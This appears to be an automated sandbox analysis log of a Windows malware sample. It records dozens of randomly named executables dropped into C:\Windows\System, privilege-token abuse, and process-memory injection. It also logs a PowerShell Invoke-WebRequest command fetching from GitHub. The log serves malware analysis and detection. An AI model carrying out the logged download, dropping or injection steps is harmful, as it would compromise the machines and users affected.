File created C:\Windows\System\izuFhrL.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FtpvCdD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WaDbhuw.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXJaKiO.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YhBZCja.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PQTvglF.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yqTGwBt.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yCDZqav.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lpaYuYL.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VmXKDrS.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qIcmMiY.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FSAdInl.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oNJtRkt.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XzJsjMf.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VmxYaIa.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uUqpsDs.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aMMgnTr.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xpNmeLz.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CWczdLW.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wDnAwZk.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yurWEOf.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QhJCvyR.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UAZeBuE.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\haAnSiX.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rPvKfJD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yBpJmqA.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EZxRXMG.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wIvmVZM.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TUmBwWN.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gXMYNDi.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zZOnWid.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vamruQp.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RWPQOgG.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\njCleBV.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XojutkZ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RgApGhI.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\boSUkfW.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sqQzZQW.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XTNJBar.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eaVKVjK.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YlLCQoX.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yPKamcO.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1632 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\mLnIUqh.exe
PID 1632 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\mLnIUqh.exe
PID 1632 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\DRvqfYQ.exe
PID 1632 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\DRvqfYQ.exe
PID 1632 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\rPhRvKm.exe
PID 1632 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\rPhRvKm.exe
PID 1632 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ubfKyDR.exe
PID 1632 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ubfKyDR.exe
PID 1632 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jFIeHxi.exe
PID 1632 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jFIeHxi.exe
PID 1632 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\YfWCkFP.exe
PID 1632 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\YfWCkFP.exe
PID 1632 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\xPHatBi.exe
PID 1632 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\xPHatBi.exe
PID 1632 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AhfufJT.exe
PID 1632 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\AhfufJT.exe
PID 1632 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TYrDlQJ.exe
PID 1632 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TYrDlQJ.exe
PID 1632 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\XTNJBar.exe
PID 1632 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\XTNJBar.exe
PID 1632 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\IorpMDV.exe
PID 1632 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\IorpMDV.exe
PID 1632 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\lzcWmVp.exe
PID 1632 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\lzcWmVp.exe
PID 1632 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\CgsQdua.exe
PID 1632 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\CgsQdua.exe
PID 1632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jNECHWu.exe
PID 1632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\jNECHWu.exe
PID 1632 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\qiXmQXA.exe
PID 1632 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\qiXmQXA.exe
PID 1632 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\KBeeiyr.exe
PID 1632 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\KBeeiyr.exe
PID 1632 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ZGetBhG.exe
PID 1632 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ZGetBhG.exe
PID 1632 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\pefFRsC.exe
PID 1632 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\pefFRsC.exe
PID 1632 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\UVCrIDv.exe
PID 1632 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\UVCrIDv.exe
PID 1632 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\EWyVhSG.exe
PID 1632 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\EWyVhSG.exe
PID 1632 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\RePWsaj.exe
PID 1632 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\RePWsaj.exe
PID 1632 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SpBLqEC.exe
PID 1632 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SpBLqEC.exe
PID 1632 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\nzVZUQA.exe
PID 1632 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\nzVZUQA.exe
PID 1632 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TVcThEj.exe
PID 1632 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TVcThEj.exe
PID 1632 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SWEYvlD.exe
PID 1632 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SWEYvlD.exe
PID 1632 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SOqYhVS.exe
PID 1632 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SOqYhVS.exe
PID 1632 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\vPfDbLc.exe
PID 1632 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\vPfDbLc.exe
PID 1632 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\fPKofCZ.exe
PID 1632 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\fPKofCZ.exe
PID 1632 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ohokUdJ.exe
PID 1632 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ohokUdJ.exe
PID 1632 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ENTEtSo.exe
PID 1632 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ENTEtSo.exe
PID 1632 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SpRceJo.exe
PID 1632 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SpRceJo.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\mLnIUqh.exe

C:\Windows\System\mLnIUqh.exe

C:\Windows\System\DRvqfYQ.exe

C:\Windows\System\DRvqfYQ.exe

C:\Windows\System\rPhRvKm.exe

C:\Windows\System\rPhRvKm.exe

C:\Windows\System\ubfKyDR.exe

C:\Windows\System\ubfKyDR.exe

C:\Windows\System\jFIeHxi.exe

C:\Windows\System\jFIeHxi.exe

C:\Windows\System\YfWCkFP.exe

C:\Windows\System\YfWCkFP.exe

C:\Windows\System\xPHatBi.exe

C:\Windows\System\xPHatBi.exe

C:\Windows\System\AhfufJT.exe

C:\Windows\System\AhfufJT.exe

C:\Windows\System\TYrDlQJ.exe

C:\Windows\System\TYrDlQJ.exe

C:\Windows\System\XTNJBar.exe

C:\Windows\System\XTNJBar.exe

C:\Windows\System\IorpMDV.exe

C:\Windows\System\IorpMDV.exe

C:\Windows\System\lzcWmVp.exe

C:\Windows\System\lzcWmVp.exe

C:\Windows\System\CgsQdua.exe

C:\Windows\System\CgsQdua.exe

C:\Windows\System\jNECHWu.exe

C:\Windows\System\jNECHWu.exe

C:\Windows\System\qiXmQXA.exe

C:\Windows\System\qiXmQXA.exe

C:\Windows\System\KBeeiyr.exe

C:\Windows\System\KBeeiyr.exe

C:\Windows\System\ZGetBhG.exe

C:\Windows\System\ZGetBhG.exe

C:\Windows\System\pefFRsC.exe

C:\Windows\System\pefFRsC.exe

C:\Windows\System\UVCrIDv.exe

C:\Windows\System\UVCrIDv.exe

C:\Windows\System\EWyVhSG.exe

C:\Windows\System\EWyVhSG.exe

C:\Windows\System\RePWsaj.exe

C:\Windows\System\RePWsaj.exe

C:\Windows\System\SpBLqEC.exe

C:\Windows\System\SpBLqEC.exe

C:\Windows\System\nzVZUQA.exe

C:\Windows\System\nzVZUQA.exe

C:\Windows\System\TVcThEj.exe

C:\Windows\System\TVcThEj.exe

C:\Windows\System\SWEYvlD.exe

C:\Windows\System\SWEYvlD.exe

C:\Windows\System\SOqYhVS.exe

C:\Windows\System\SOqYhVS.exe

C:\Windows\System\vPfDbLc.exe

C:\Windows\System\vPfDbLc.exe

C:\Windows\System\fPKofCZ.exe

C:\Windows\System\fPKofCZ.exe

C:\Windows\System\ohokUdJ.exe

C:\Windows\System\ohokUdJ.exe

C:\Windows\System\ENTEtSo.exe

C:\Windows\System\ENTEtSo.exe

C:\Windows\System\SpRceJo.exe

C:\Windows\System\SpRceJo.exe

C:\Windows\System\rragGEt.exe

C:\Windows\System\rragGEt.exe

C:\Windows\System\mJkqKpa.exe

C:\Windows\System\mJkqKpa.exe

C:\Windows\System\tfHtKyA.exe

C:\Windows\System\tfHtKyA.exe

C:\Windows\System\JNxVXhR.exe

C:\Windows\System\JNxVXhR.exe

C:\Windows\System\UYUAMRF.exe

C:\Windows\System\UYUAMRF.exe

C:\Windows\System\gLqXpKJ.exe

C:\Windows\System\gLqXpKJ.exe

C:\Windows\System\dnrcjnc.exe

C:\Windows\System\dnrcjnc.exe

C:\Windows\System\dyneJbh.exe

C:\Windows\System\dyneJbh.exe

C:\Windows\System\EZxRXMG.exe

C:\Windows\System\EZxRXMG.exe

C:\Windows\System\FxEQyjr.exe

C:\Windows\System\FxEQyjr.exe

C:\Windows\System\ImaAgBs.exe

C:\Windows\System\ImaAgBs.exe

C:\Windows\System\TilSYam.exe

C:\Windows\System\TilSYam.exe

C:\Windows\System\obRaRIO.exe

C:\Windows\System\obRaRIO.exe

C:\Windows\System\bfvnlnd.exe

C:\Windows\System\bfvnlnd.exe

C:\Windows\System\oNIKJDw.exe

C:\Windows\System\oNIKJDw.exe

C:\Windows\System\ROdFZMn.exe

C:\Windows\System\ROdFZMn.exe

C:\Windows\System\ILfgfLV.exe

C:\Windows\System\ILfgfLV.exe

C:\Windows\System\erOqubK.exe

C:\Windows\System\erOqubK.exe

C:\Windows\System\bPGKoNc.exe

C:\Windows\System\bPGKoNc.exe

C:\Windows\System\SnKeOOS.exe

C:\Windows\System\SnKeOOS.exe

C:\Windows\System\ZewsToJ.exe

C:\Windows\System\ZewsToJ.exe

C:\Windows\System\xhLUtYT.exe

C:\Windows\System\xhLUtYT.exe

C:\Windows\System\wfZxASb.exe

C:\Windows\System\wfZxASb.exe

C:\Windows\System\xQOQncf.exe

C:\Windows\System\xQOQncf.exe

C:\Windows\System\VNdxGSY.exe

C:\Windows\System\VNdxGSY.exe

C:\Windows\System\UbzrNcX.exe

C:\Windows\System\UbzrNcX.exe

C:\Windows\System\NwJOvXT.exe

C:\Windows\System\NwJOvXT.exe

C:\Windows\System\YxkXuuq.exe

C:\Windows\System\YxkXuuq.exe

C:\Windows\System\exisjIw.exe

C:\Windows\System\exisjIw.exe

C:\Windows\System\bTZSkmS.exe

C:\Windows\System\bTZSkmS.exe

C:\Windows\System\UdbHaJi.exe

C:\Windows\System\UdbHaJi.exe

C:\Windows\System\MzzPSJy.exe

C:\Windows\System\MzzPSJy.exe

C:\Windows\System\PemyOFh.exe

C:\Windows\System\PemyOFh.exe

C:\Windows\System\melJkGS.exe

C:\Windows\System\melJkGS.exe

C:\Windows\System\SciHxYq.exe

C:\Windows\System\SciHxYq.exe

C:\Windows\System\yaZvpjp.exe

C:\Windows\System\yaZvpjp.exe

C:\Windows\System\TLuHRRD.exe

C:\Windows\System\TLuHRRD.exe

C:\Windows\System\vTCifhA.exe

C:\Windows\System\vTCifhA.exe

C:\Windows\System\yYQrSpZ.exe

C:\Windows\System\yYQrSpZ.exe

C:\Windows\System\VDHWYnC.exe

C:\Windows\System\VDHWYnC.exe

C:\Windows\System\QTQJnpV.exe

C:\Windows\System\QTQJnpV.exe

C:\Windows\System\AOOtLqy.exe

C:\Windows\System\AOOtLqy.exe

C:\Windows\System\NUEeCJw.exe

C:\Windows\System\NUEeCJw.exe

C:\Windows\System\ILuRwcc.exe

C:\Windows\System\ILuRwcc.exe

C:\Windows\System\GwvWCMa.exe

C:\Windows\System\GwvWCMa.exe

C:\Windows\System\nFxxqIq.exe

C:\Windows\System\nFxxqIq.exe

C:\Windows\System\kLZYyYb.exe

C:\Windows\System\kLZYyYb.exe

C:\Windows\System\cmaPvGH.exe

C:\Windows\System\cmaPvGH.exe

C:\Windows\System\CKExmYi.exe

C:\Windows\System\CKExmYi.exe

C:\Windows\System\SZZwIFr.exe

C:\Windows\System\SZZwIFr.exe

C:\Windows\System\VRnQqsa.exe

C:\Windows\System\VRnQqsa.exe

C:\Windows\System\ldwaXGA.exe

C:\Windows\System\ldwaXGA.exe

C:\Windows\System\sXJaKiO.exe

C:\Windows\System\sXJaKiO.exe

C:\Windows\System\cPsFBNf.exe

C:\Windows\System\cPsFBNf.exe

C:\Windows\System\NFBevYF.exe

C:\Windows\System\NFBevYF.exe

C:\Windows\System\ZLoFvkG.exe

C:\Windows\System\ZLoFvkG.exe

C:\Windows\System\fXthTIk.exe

C:\Windows\System\fXthTIk.exe

C:\Windows\System\tkKulAx.exe

C:\Windows\System\tkKulAx.exe

C:\Windows\System\psGJJwu.exe

C:\Windows\System\psGJJwu.exe

C:\Windows\System\sDMLrdm.exe

C:\Windows\System\sDMLrdm.exe

C:\Windows\System\mrMwYJP.exe

C:\Windows\System\mrMwYJP.exe

C:\Windows\System\MqQEvYj.exe

C:\Windows\System\MqQEvYj.exe

C:\Windows\System\bHLSIRf.exe

C:\Windows\System\bHLSIRf.exe

C:\Windows\System\WxiMJAf.exe

C:\Windows\System\WxiMJAf.exe

C:\Windows\System\BCUFXxC.exe

C:\Windows\System\BCUFXxC.exe

C:\Windows\System\PBfVQGG.exe

C:\Windows\System\PBfVQGG.exe

C:\Windows\System\PgYuTYx.exe

C:\Windows\System\PgYuTYx.exe

C:\Windows\System\GKYkAow.exe

C:\Windows\System\GKYkAow.exe

C:\Windows\System\CJUDZhd.exe

C:\Windows\System\CJUDZhd.exe

C:\Windows\System\EpIKKeR.exe

C:\Windows\System\EpIKKeR.exe

C:\Windows\System\McCsHFC.exe

C:\Windows\System\McCsHFC.exe

C:\Windows\System\gdjkcKu.exe

C:\Windows\System\gdjkcKu.exe

C:\Windows\System\SRckSqj.exe

C:\Windows\System\SRckSqj.exe

C:\Windows\System\smiQoxB.exe

C:\Windows\System\smiQoxB.exe

C:\Windows\System\JXqnmYy.exe

C:\Windows\System\JXqnmYy.exe

C:\Windows\System\zdFYhDi.exe

C:\Windows\System\zdFYhDi.exe

C:\Windows\System\jewLViA.exe

C:\Windows\System\jewLViA.exe

C:\Windows\System\JKShJRV.exe

C:\Windows\System\JKShJRV.exe

C:\Windows\System\BSFxDFW.exe

C:\Windows\System\BSFxDFW.exe

C:\Windows\System\orORSlQ.exe

C:\Windows\System\orORSlQ.exe

C:\Windows\System\vQCpwZe.exe

C:\Windows\System\vQCpwZe.exe

C:\Windows\System\UPYFAAO.exe

C:\Windows\System\UPYFAAO.exe

